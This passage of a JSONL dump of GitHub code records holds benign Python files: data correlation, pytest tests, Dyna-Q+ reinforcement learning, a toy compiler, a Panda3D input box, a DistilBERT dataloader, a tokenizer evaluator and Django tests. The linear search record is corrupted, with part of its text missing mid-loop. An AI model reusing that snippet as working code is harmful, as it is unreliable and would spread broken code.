np.corrcoef(Dollar[0:43],Brent[96:-1]) \n# Dollar has one month less than Brent (dimension error) so use -1\nprint('DollarBrent09_15', DollarBrent09_15[0][1])\nprint('DollarBrent15_18', DollarBrent15_18[0][1])\nprint('overall GoldBrent', np.corrcoef(Dollar,Brent)[0][1])","repo_name":"shervinrad100/Python-Projects","sub_path":"Hobby/Gold, Dollar, Oil/oilvGold.py","file_name":"oilvGold.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"25359348993","text":"import os\n\nimport pytest\n\nfrom stringify.stringify import stringify\n\n# Вернуть полный путь к файлу в директории fixtures\ndef get_fixture_path(file_name):\n current_dir = os.path.dirname(os.path.abspath(__file__))\n return os.path.join(current_dir, 'fixtures', file_name)\n\n# Прочитать файл по указанному пути\ndef read(file_path):\n with open(file_path, 'r') as f:\n result = f.read()\n return result\n\n# Создаем несколько тестовых значений примитивных типов \n# данных для проверки функции stringify()\nprimitives = {\n \"string\": \"value\",\n \"boolean\": True,\n \"number\": 5,\n}\n\n# Создаем сложную вложенную структуру данных \n# для проверки функции stringify()\nnested = {\n \"string\": \"value\",\n \"boolean\": True,\n \"number\": 5,\n \"dict\": {\n 5: \"number\",\n None: \"None\",\n True: \"boolean\",\n \"value\": \"string\",\n \"nested\": {\n \"boolean\": True,\n \"string\": 'value',\n \"number\": 5,\n None: \"None\",\n },\n },\n}\n\n# Создаем список тестовых случаев для проверки функции stringify()\n# Каждый случай содержит три параметра: заменитель (replacer), \n# количество пробелов (spases_count) и индекс \n# соответствующей строки в файлах plain.txt и nested.txt\ncases = [\n ('|-', 1, 0), # первый уровень вложенности, 1 пробел\n ('|-', 2, 1), # второй уровень вложенности, 2 пробела\n (' ', 3, 2), # третий уровень вложенности, 3 пробела\n]\n\n# Тест функции stringify() на примитивных типах данных\n# Проверяем, что функция правильно преобразует строку, \n# логическое значение и число в строку\n@pytest.mark.parametrize(\"value\", primitives.values())\ndef test_primitives(value):\n \n assert stringify(value) == str(value)\n\nplain_data = read(get_fixture_path('plain.txt')).rstrip().split('\\n\\n\\n')\nnested_data = read(get_fixture_path('nested.txt')).rstrip().split('\\n\\n\\n')\n\n# Тест функции stringify() на сложной вложенной структуре данных\n# Проверяем, что функция правильно преобразует словарь с вложенными словарями и списками в строку с заданным \n# количеством пробелов и заменителями\n@pytest.mark.parametrize(\"replacer,spases_count,case_index\", cases)\ndef test_nested(replacer, spases_count, case_index):\n expected = nested_data[case_index]\n assert stringify(nested, replacer, spases_count) == expected\n\n# Тест функции stringify() на примитивных типах данных\n# Проверяем, что функция правильно преобразует словарь с примитивными типами данных в строку с заданным \n# количеством пробелов и заменителями\n@pytest.mark.parametrize(\"replacer,spases_count,case_index\", cases)\ndef test_plain(replacer, spases_count, case_index):\n expected = plain_data[case_index]\n assert stringify(primitives, replacer, spases_count) == expected\n\n\ndef test_default_values():\n assert stringify(primitives) == plain_data[3]\n assert stringify(primitives, ' ') == plain_data[3]\n assert stringify(primitives, '...') == plain_data[4]\n assert stringify(nested) == nested_data[3]\n assert stringify(nested, ' ') == nested_data[3]\n assert stringify(nested, '...') == nested_data[4]\n","repo_name":"AlexanderLarriva/Stringify","sub_path":"tests/test_stringify.py","file_name":"test_stringify.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"28919418648","text":"#Mateo Guaman Castro\n#Homework 3\n#Tufts University\n#Comp 150: Reinforcement Learning\n#Exercise 8.4: Dyna-Q+\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nclass Environment:\n def __init__(self):\n self.maze = self.generate_maze()\n def generate_maze(self):\n maze = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 100],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0 ,0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 500, 1, 1, 1, 1, 1]])\n return maze\n\n\nclass Agent:\n def __init__(self, maze, epsilon, gamma, alpha, kappa, n):\n #Initialize maze\n self.maze = maze\n print(\"Initial maze\")\n #Initialize action space A\n self.act = [-1, 0, 1]\n self.A = [(1,0), (-1, 0), (0, 1), (0, -1)]\n #Initialize state space S\n self.row_pos = [i for i in range(self.maze.shape[0])]\n self.col_pos = [i for i in range(self.maze.shape[1])]\n\n self.S = list(((x,y) for x in self.row_pos for y in self.col_pos))\n\n #Array to keep track of previously selected states and actions\n self.previously_selected = np.zeros((len(self.S), len(self.A)))\n self.Q, self.Model = self.initialize_Q_Model(self.S, self.A)\n self.lastVisited = np.zeros((len(self.S), len(self.A)))\n self.epsilon = epsilon\n self.gamma = gamma\n self.alpha = alpha\n self.kappa = kappa\n self.n = n\n\n def initialize_Q_Model(self, state_space, action_space):\n '''\n Initializes Q(s, a) anc C(s, a) where s in Z^4 and a in Z^2\n Input:\n State space as list of (row_pos, col_pos, row_vel, col_vel)\n Action space as list of (row_delta, col_delta)\n Returns:\n Dictionary Q with key ((row_pos, col_pos, row_vel, col_vel), (row_delta, col_delta)) and value radnom number from normal distribution\n Dictionary Model with key ((row_pos, col_pos, row_vel, col_vel), (row_delta, col_delta)) and value [0,0] where the elements are [Reward, New_state]\n '''\n state_action_tuples = tuple((x, y) for x in state_space for y in action_space)\n Q = {l:np.random.normal(0,1) for l in state_action_tuples}\n Model = {l:[0, 0] for l in state_action_tuples}\n return Q, Model\n\n\n def argmax(self, state):\n '''\n Finds the argmax_a and max_a for a given state. Used for Dyna-Q and Dyna-Q+ with bonus on the reward\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n arg: Index of what action in self.A has the highest value\n highest_Q: Q_value for action with highest value\n '''\n highest_Q = self.Q[state, self.A[0]]\n arg = 0\n for i in range(1, len(self.A)):\n if self.Q[state, self.A[i]] > highest_Q:\n highest_Q = self.Q[state, self.A[i]]\n arg = i\n return arg, highest_Q\n\n def argmax_bonus(self, state):\n '''\n Finds the argmax_a and max_a for a given state. Used Dyna-Q+ with bonus on the action value\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n arg: Index of what action in self.A has the highest value + bonus\n highest_Q: Q_value for action with highest value\n '''\n highest_Q = self.Q[state, self.A[0]] + self.kappa * math.sqrt(self.lastVisited[self.S.index(state), 0])\n arg = 0\n for i in range(1, len(self.A)):\n if self.Q[state, self.A[i]] + self.kappa * math.sqrt(self.lastVisited[self.S.index(state), i]) > highest_Q:\n highest_Q = self.Q[state, self.A[i]]\n arg = i\n return arg, highest_Q\n\n def epsilon_greedy(self, state):\n '''\n Selects an action based on the epsilon-greedy method\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n\n '''\n rand_val = np.random.random()\n if rand_val >= self.epsilon:\n action, _ = self.argmax(state)\n else:\n action = np.random.randint(0,len(self.A))\n return action\n\n def epsilon_greedy_bonus(self, state):\n '''\n Selects an action based on the epsilon-greedy method\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n\n '''\n rand_val = np.random.random()\n if rand_val >= self.epsilon:\n action, _ = self.argmax_bonus(state)\n else:\n action = np.random.randint(0,len(self.A))\n return action\n\n def Q_step(self, state, action, reward, new_state):\n act = self.A[action]\n _, max_a_new_state = self.argmax(new_state)\n self.Q[state, act] += self.alpha * (reward + self.gamma * max_a_new_state - self.Q[state, act])\n return\n\n def update_model(self, state, action, reward, new_state):\n act = self.A[action]\n self.previously_selected[self.S.index(state), self.A.index(act)] = 1\n self.Model[state, act][0] = reward\n self.Model[state, act][1] = new_state\n return\n\n def planning_DynaQ(self):\n for _ in range(0,self.n):\n prev_state = self.random_observed_state()\n prev_action = self.random_prev_action(prev_state)\n state = self.S[prev_state]\n action = self.A[prev_action]\n model_sa = self.Model[state, action]\n reward = model_sa[0]\n new_state = model_sa[1]\n self.Q_step(state, prev_action, reward, new_state)\n return\n\n def planning_DynaQPlus_reward(self):\n for _ in range(0, self.n):\n prev_state = self.random_observed_state()\n prev_action = self.random_prev_action(prev_state)\n state = self.S[prev_state]\n action = self.A[prev_action]\n model_sa = self.Model[state, action]\n reward = model_sa[0] + self.kappa * math.sqrt(self.lastVisited[prev_state, prev_action])\n new_state = model_sa[1]\n self.Q_step(state, prev_action, reward, new_state)\n return\n\n def planning_DynaQPlus_action(self):\n for i in range(0, self.n):\n prev_state = self.random_observed_state()\n prev_action = self.random_prev_action(prev_state)\n state = self.S[prev_state]\n action = self.A[prev_action]\n if (self.previously_selected[prev_state, prev_action] == 1):\n model_sa = self.Model[state, action]\n reward = model_sa[0]\n new_state = model_sa[1]\n else:\n reward = 0\n new_state = state\n self.Q_step(state, prev_action, reward, new_state)\n return\n\n\n def random_observed_state(self):\n indeces = np.where(self.previously_selected == 1)[0]\n return np.random.choice(indeces)\n\n def random_prev_action(self, state_index):\n indeces = np.where(self.previously_selected[state_index, :] == 1)[0]\n return np.random.choice(indeces)\n\n def update_last_visited(self, state, action):\n act = self.A[action]\n self.lastVisited += 1\n self.lastVisited[self.S.index(state), self.A.index(act)] = 0\n return\n\n\n\n\ndef main():\n steps_per_n_avg = np.ndarray((10,10))\n epsilon = 0.3\n gamma = 0.95\n alpha = 0.7\n kappa = 0.01\n n = 10\n num_steps = 100000\n num_iterations_to_avg = 10\n\n avg_DynaQ = np.zeros((num_iterations_to_avg, num_steps))\n avg_DynaQPlus_reward = np.zeros((num_iterations_to_avg, num_steps))\n avg_DynaQPlus_action = np.zeros((num_iterations_to_avg, num_steps))\n\n for k in range(0, num_iterations_to_avg):\n cum_reward = []\n env = Environment()\n agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n episode_info, cum_reward = generate_episode_DynaQ(env, agent, num_steps)\n avg_DynaQ[k, :] = cum_reward\n\n\n cum_reward = []\n env = Environment()\n agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n episode_info, cum_reward = generate_episode_DynaQPlus_action(env, agent, num_steps)\n avg_DynaQPlus_action[k, :] = cum_reward\n\n\n\n cum_reward = []\n env = Environment()\n agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n episode_info, cum_reward = generate_episode_DynaQPlus_reward(env, agent, num_steps)\n avg_DynaQPlus_reward[k, :] = cum_reward\n\n avg_DynaQ = np.mean(avg_DynaQ, axis = 0)\n DynaQ_plot, = plt.plot(np.arange(num_steps), avg_DynaQ, 'r', label='Dyna-Q Learning (n = 4)')\n avg_DynaQPlus_action = np.mean(avg_DynaQPlus_action, axis = 0)\n DynaQAction_plot, = plt.plot(np.arange(num_steps), avg_DynaQPlus_action, 'g', label='Dyna-Q+ Learning, bonus on action (n = 4)')\n avg_DynaQPlus_reward = np.mean(avg_DynaQPlus_reward, axis = 0)\n DynaQReward_plot, = plt.plot(np.arange(num_steps), avg_DynaQPlus_reward, 'b', label='Dyna-Q+ Learning, bonus on reward (n = 4)')\n\n plt.title(\"Cumulative reward vs Number of steps\")\n plt.ylabel(\"Cumulative reward\")\n plt.xlabel(\"Number of steps\")\n plt.legend(handles=[Q_plot, DynaQ_plot])\n plt.savefig('cumReward.png', dpi=300, bbox_inches='tight')\n\n plt.close()\n plot_on_track(env, episode_info)\n plt.imshow(env.maze * 5, cmap='hot', interpolation='nearest')\n plt.title(str(\"Number of steps: \" + str(episode_info.shape[0])))\n plt.savefig('figure.png', dpi=300, bbox_inches='tight')\n\n\ndef generate_episode_DynaQ(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQ()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef generate_episode_DynaQPlus_reward(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQPlus_reward()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef generate_episode_DynaQPlus_action(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy_bonus(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQPlus_action()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef starting_state(env):\n possible_starts = np.where(env.maze[-1,:] == 500)[0]\n i = np.random.randint(0,len(possible_starts))\n state = (env.maze.shape[0]-1, possible_starts[i])\n return state\n\n\ndef state_transition(env, agent, state, action):\n act = agent.A[action]\n crossed_boundary = False\n crossed_finish = False\n reward = 0\n temp_state = list(state)\n\n temp_state[0] += act[0]\n temp_state[1] += act[1]\n\n if (not in_track(env, temp_state)):\n crossed_boundary = True\n return state, crossed_boundary, crossed_finish, reward\n if in_finish_line(env, temp_state):\n reward = 1\n crossed_finish = True\n return tuple(temp_state), crossed_boundary, crossed_finish, reward\n return tuple(temp_state), crossed_boundary, crossed_finish, reward\n\ndef in_track(env, state):\n return in_bounds(env, state) and (env.maze[state[0], state[1]] != 0)\n\ndef in_bounds(env, state):\n return (state[0] >= 0 and state[0] < env.maze.shape[0]) and (state[1] >= 0 and state[1] < env.maze.shape[1])\n\ndef in_finish_line(env, state):\n return env.maze[state[0], state[1]] == 100\n\ndef plot_on_track(env, trajectories):\n for i in range(0, trajectories.shape[0]):\n state = trajectories[i, 0]\n env.maze[state[0], state[1]] += 5\n\ndef update_cum_reward(reward_list, current_reward):\n number_rewards = len(reward_list)\n if number_rewards == 0:\n reward_list.append(current_reward)\n else:\n last_reward = reward_list[number_rewards - 1]\n reward_list.append(last_reward + current_reward)\n return reward_list\n\ndef change_maze(env, agent):\n env.maze = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 100],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0 ,0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 500, 1, 1, 1, 1, 1]])\n agent.maze = env.maze\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mateoguaman/Reinforcement-Learning","sub_path":"HW3/maze2.py","file_name":"maze2.py","file_ext":"py","file_size_in_byte":14490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"29380979611","text":"import sys\nfrom collections import deque\nfrom heapq import heappush, heappop\nsys.setrecursionlimit(10**9)\nsys.stdin = open('../input.txt')\n\ndef post(start, end):\n if start > end:\n return\n mid = end + 1\n for i in range(start+1, end+1):\n if Num[i] > Num[start]:\n mid = i\n break\n\n post(start+1, mid-1)\n post(mid, end)\n print(Num[start])\n\nif __name__==\"__main__\":\n Num = list()\n while True:\n try:\n N = int(input())\n Num.append(N)\n except:\n break\n\n post(0, len(Num)-1)","repo_name":"Taesun0727/Algorithms","sub_path":"Python/BaekJoon/5639/sun.py","file_name":"sun.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"23312466124","text":"from pila import Pila\r\n\r\nfrom functools import reduce\r\n\r\ndiccionario=['*','/','+','-','=']\r\nvariables = {}\r\nerror=[]\r\n\r\ndef esOperador(diccionario,ch):\r\n if(len([x for x in diccionario if x==ch])>0):\r\n return True\r\n else:\r\n return False\r\n\r\ndef verDiccionario(diccionario,ch):\r\n if(esOperador(diccionario,ch)):\r\n return True\r\n elif (ch.isdigit()):\r\n return True\r\n elif (ch.isalpha()):\r\n return True\r\n else:\r\n return False\r\n\r\ndef estaAsignada(variable):\r\n if (variable in variables):\r\n return True\r\n else:\r\n return False\r\n\r\ndef analisis(lista):\r\n for x in lista:\r\n for ch in x:\r\n if(not verDiccionario(diccionario,ch)):\r\n error.append(\"Error caracter no válido \"+ch)\r\n if (not(len(error)>0)):\r\n pila= Pila()\r\n for x in lista:\r\n if(not(len(error)>0)):\r\n analisisSintactico(x)\r\n for ch in x:\r\n if(not(len(error)>0)):\r\n pila.apilar(ch)\r\n if(ch==\"=\"):\r\n pila.desapilar()\r\n elif((ch.isalpha)and (not(ch.isdigit())) and (not(esOperador(diccionario,ch)))):\r\n if(ch==x[len(x)-2]):\r\n pila.desapilar()\r\n if(len(pila.items)>1):\r\n error.append(\"Error no hay operador\")\r\n else:\r\n variables[ch]=pila.desapilar()\r\n else:\r\n if(estaAsignada(ch)):\r\n pila.desapilar()\r\n pila.apilar(variables[ch])\r\n else:\r\n error.append(\"Error variable inexistente \"+ch)\r\n elif((len(pila.items)>2)and(esOperador(diccionario,ch))):\r\n signo = pila.desapilar()\r\n num2 = pila.desapilar()\r\n num1 = pila.desapilar()\r\n pila.apilar(resolver(num1,num2,signo))\r\n else:\r\n print(error)\r\n else:\r\n print(error)\r\n print(variables)\r\n else: \r\n print(error)\r\n\r\ndef evaluar(num1,num2,signo):\r\n if signo=='+':\r\n return str(int(num1) + int(num2))\r\n elif signo=='-':\r\n return str(int(num1) - int(num2))\r\n elif signo=='*':\r\n return str(int(num1) * int(num2))\r\n elif signo=='/':\r\n return str(int((int(num1) / int(num2))))\r\n else:\r\n return 0\r\n \r\n \r\n\r\ndef resolver(num1,num2,signo):\r\n if(num1.isdigit())and(num2.isdigit())and(esOperador(diccionario,signo)):\r\n return evaluar(num1,num2,signo)\r\n else:\r\n error.append(\"Error sintaxis invalida \"+num2+\" \"+signo+\" \"+num1)\r\n return 0\r\n \r\ndef analisisSintactico(lista):\r\n if(esOperador(diccionario,lista[0])):\r\n error.append(\"Analisis Sintactico: incorrecto, No puede iniciar con un operador\")\r\n elif(lista[len(lista)-1] != '='):\r\n error.append(\"Analisis Sintactico: incorrecto, No hay operaador de igualdad\")\r\n elif(not(lista[len(lista)-2].isalpha())):\r\n error.append(\"Analisis Sintactico: incorrecto, No hay variable para asignar valor\")\r\n \r\n\r\na=open(\"datos.txt\",'r')\r\nlistaG= [y.split() for y in [x.strip('\\n') for x in a.readlines()]]\r\n\r\nanalisis(listaG)\r\n\r\n\r\n\r\n\r\n","repo_name":"SCVA/CompiladoresIntro","sub_path":"Ejercicio compilador/compilador.py","file_name":"compilador.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"21852675959","text":"# Linear_search \r\n\r\ndef linear_search(alist,item):\r\n pos=0\r\n found=False\r\n\r\n while positem:\r\n stop=True\r\n else:\r\n pos+=1\r\n return found\r\n\r\nalist=[1,2,3,4,5,6,7,8,9,10]\r\nprint(linear_search1(alist,3))\r\nprint(linear_search1(alist,13))\r\n","repo_name":"rahul9852-dot/Data-Structure-and-Algorithms","sub_path":"DSA/searching&sorting/linear_searching.py","file_name":"linear_searching.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"24592828156","text":"import file_processor\nimport user_interface\n\nINPUT_FILE_NAME = 'text.txt'\n\n\ndef main():\n \"\"\"\n Main function of the application that initiates the text file processing.\n Process Flow:\n 1. Gets the path to the input text file (input_file_path) and the maximum\n line size (max_chunk_size)\n using the user interface from the user_interface module.\n 2. Processes the text file by splitting lines into chunks and saves the\n result in a separate file.\n This process is done using the process_file function from the\n file_processor module.\n \"\"\"\n\n # Path to the input text file (can be changed to another file).\n input_file_path = INPUT_FILE_NAME\n # Get the maximum line size.\n max_chunk_size = user_interface.get_max_chunk_size_from_user()\n\n # Start processing the text file with the specified maximum line size.\n file_processor.process_file(input_file_path, max_chunk_size)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-69-23","sub_path":"Tasks/Romanychev/Task4/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"30398302927","text":"from direct.gui.OnscreenText import OnscreenText \r\nfrom direct.gui.DirectGui import *\r\n\r\nfrom panda3d.core import NodePath\r\nfrom panda3d.core import TextNode\r\n\r\nclass TextInput():\r\n \r\n def __init__(self, pos, onEnterTextFn):\r\n self.onEnterTextFn = onEnterTextFn\r\n self.bk_text = \"This is my Demo\"\r\n# self.textObject = OnscreenText(text = self.bk_text, pos = (0.95,-0.95), \r\n# scale = 0.07, fg = (1,0.5,0.5,1), \r\n# align = TextNode.ACenter,mayChange=1)\r\n \r\n self.addText(pos)\r\n \r\n def addText(self, pos):\r\n self.entry = DirectEntry(text = \"\", scale=.05, command = self.setText,\r\n initialText=\"Type Something\", numLines = 2, \r\n focus=1, focusInCommand = self.clearText)\r\n entry = self.entry\r\n# entry.setColor(1, 1, 1, 0.5)\r\n entry.setPos(pos.x, 0, pos.y)\r\n print(\"bounds \" + str(entry.getHeight()))\r\n# entry.\r\n \r\n# self.entry.setObscureMode()\r\n \r\n def setText(self, textEntered):\r\n self.entry.destroy()\r\n self.onEnterTextFn(textEntered)\r\n \r\n def clearText(self):\r\n self.entry.enterText('')\r\n \r\n\r\n \r\n ","repo_name":"Nickan/Mind-Map-Panda3D","sub_path":"src/gui/textinput.py","file_name":"textinput.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"12255578938","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom datasets import load_dataset\nfrom transformers import AutoModel, AutoTokenizer\n\n\ndef collate_fn(batch):\n batch_input_ids = torch.stack([torch.tensor(x[\"input_ids\"]) for x in batch])\n batch_attention_masks = torch.stack([torch.tensor(x[\"attention_mask\"]) for x in batch])\n\n model = AutoModel.from_pretrained(\"distilbert-base-uncased\")\n outputs = model(batch_input_ids, attention_mask=batch_attention_masks)\n\n batch_inputs = outputs.last_hidden_state\n batch_outputs = torch.stack([torch.tensor(x[\"label\"]) for x in batch])\n return batch_inputs, batch_outputs\n\n\ndef get_dataloader_and_vocab(batch_size, split):\n tokenizer = AutoTokenizer.from_pretrained(\"distilbert-base-uncased\")\n dataset = load_dataset(\"rotten_tomatoes\", split=split)\n encoded_dataset = dataset.map(lambda batch: tokenizer(batch[\"text\"], padding=True, truncation=True), batched=True, batch_size=None)\n\n dataloader = DataLoader(encoded_dataset, batch_size=batch_size, shuffle=True, collate_fn=collate_fn)\n vocab = tokenizer.get_vocab()\n\n return dataloader, vocab\n\n\nif __name__ == \"__main__\":\n train_dataloader, vocab = get_dataloader_and_vocab(64, \"train\")\n batch_inputs, batch_outputs = next(iter(train_dataloader))\n print(batch_inputs.shape, batch_outputs.shape)\n","repo_name":"benjaminpodmore/nlp","sub_path":"RNN/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"28297135767","text":"from features import scan\nfrom data import Data\nfrom random import choice\nfrom utils import draw_bar\n\nfrom typing import List\n\n\ndef evaluate(data: Data, prediction: str, example: bool = False) -> None:\n \"\"\"\n Evaluate data object on provided prediction prolix tag sequence.\n \"\"\"\n\n if len(data.trueTokenization) != len(prediction):\n raise Exception(\n f'True data length ({len(data.trueTokenization)}) does not match prediction length ({len(prediction)})'\n )\n\n wTP = 0\n wFP = 0\n wTN = 0\n wFN = 0\n\n indexFP = []\n indexFN = []\n\n POSITIVE = {'W', 'B'}\n NEGATIVE = {'N', 'S'}\n for i, (trueTag, predTag) in enumerate(zip(data.trueTokenization, prediction)):\n if trueTag in NEGATIVE and predTag in NEGATIVE:\n wTN += 1\n elif trueTag in POSITIVE and predTag in POSITIVE:\n wTP += 1\n elif trueTag in POSITIVE and predTag in NEGATIVE:\n wFN += 1\n indexFN.append(i)\n elif trueTag in NEGATIVE and predTag in POSITIVE:\n wFP += 1\n indexFP.append(i)\n\n def safeDiv(x: float, y: float):\n return x/y if y != 0 else float('nan')\n\n total = wTP + wFP + wTN + wFN\n wTP = safeDiv(wTP, total)\n wFP = safeDiv(wFP, total)\n wTN = safeDiv(wTN, total)\n wFN = safeDiv(wFN, total)\n\n print('Any-level: ')\n print(f'TP: {wTP*100:6.2f}%, FP: {wFP*100:6.2f}%')\n print(f'FN: {wFN*100:6.2f}%, TN: {wTN*100:6.2f}%')\n print(f'Precision: {wTP/(wTP+wFP)*100:6.2f}%')\n print(f'Recall: {wTP/(wTP+wFN)*100:6.2f}%')\n\n if example:\n show_sample(data, prediction, indexFN, indexFP)\n\n draw_bar()\n\n\ndef show_sample(data: Data, prediction: str, indexFN: List[int], indexFP: List[int], window: int = 20) -> None:\n if indexFP or indexFN:\n print()\n if indexFN:\n index = choice(indexFN)\n print('False Negative example')\n print(data.all[index-window:index+window], sep='')\n print(prediction[index-window:index+window], sep='')\n if indexFP:\n index = choice(indexFP)\n print('False Positive example')\n print(data.all[index-window:index+window], sep='')\n print(prediction[index-window:index+window], sep='')\n\n\ndef decode(data: Data, prediction: str) -> None:\n \"\"\"\n Decode input string against predicted sequence\n \"\"\"\n out = []\n buffer = ''\n for tag, char in zip(prediction, data.all):\n buffer += char\n if tag in {'W', 'B'}:\n out.append(buffer)\n buffer = ''\n out += buffer\n out = [x.strip() for x in out]\n return '|' + '|'.join(out) + '|'\n","repo_name":"zouharvi/hmm-tokenizer","sub_path":"src/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"19982448080","text":"#! /usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import unicode_literals\nimport logging\nimport unittest\nimport json\nfrom bs4 import BeautifulSoup\nfrom django.test import Client\n\nlogging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n\n\nclass FetchAllExplanationsTest(unittest.TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def get_regions(self, document):\n resp = self.client.post(\n '/python/scan',\n data={'origin': 'www.test.com', 'document': document})\n regions = json.loads(resp.content)['regions']\n return regions\n\n def test_get_region(self):\n string = \" abs(2) \"\n regions = self.get_regions(string)\n\n self.assertEqual(len(regions), 1)\n r = regions[0]\n self.assertEqual(\n r['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r['start_index'], 0)\n self.assertEqual(r['end_index'], 2)\n self.assertIn(\n \"Return the absolute value of a number.\",\n BeautifulSoup(r['document']).text\n )\n\n def test_get_multiple_regions(self):\n string = \" abs(2)\\nlen('fdsjkfds')\\nbin(1) \"\n regions = self.get_regions(string)\n\n self.assertEqual(len(regions), 3)\n r0 = regions[0]\n self.assertEqual(\n r0['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r0['start_index'], 0)\n self.assertEqual(r0['end_index'], 2)\n self.assertIn(\n \"Return the absolute value of a number.\",\n BeautifulSoup(r0['document']).text\n )\n\n r1 = regions[1]\n self.assertEqual(\n r1['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r1['start_index'], 7)\n self.assertEqual(r1['end_index'], 9)\n self.assertIn(\n \"Return the length (the number of items) of an object.\",\n BeautifulSoup(r1['document']).text\n )\n\n\nclass FetchExplanationForPlaintextTest(unittest.TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def get_explanation(self, text):\n resp = self.client.post(\n '/python/explain',\n data={'origin': 'www.test.com', 'text': text})\n return resp.content\n\n def test_explain_python_builtin_from_plaintext(self):\n resp = self.get_explanation('zip')\n self.assertIn(\"This function returns a list of tuples,\", resp)\n\n def test_fail_to_explain_invalid_python_builtin_from_plaintext(self):\n resp = self.get_explanation('zip()')\n self.assertIn(\"'zip()' could not be explained as a python built-in.\", resp)\n","repo_name":"andrewhead/tutorons-server","sub_path":"tutorons/tests/python/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"}
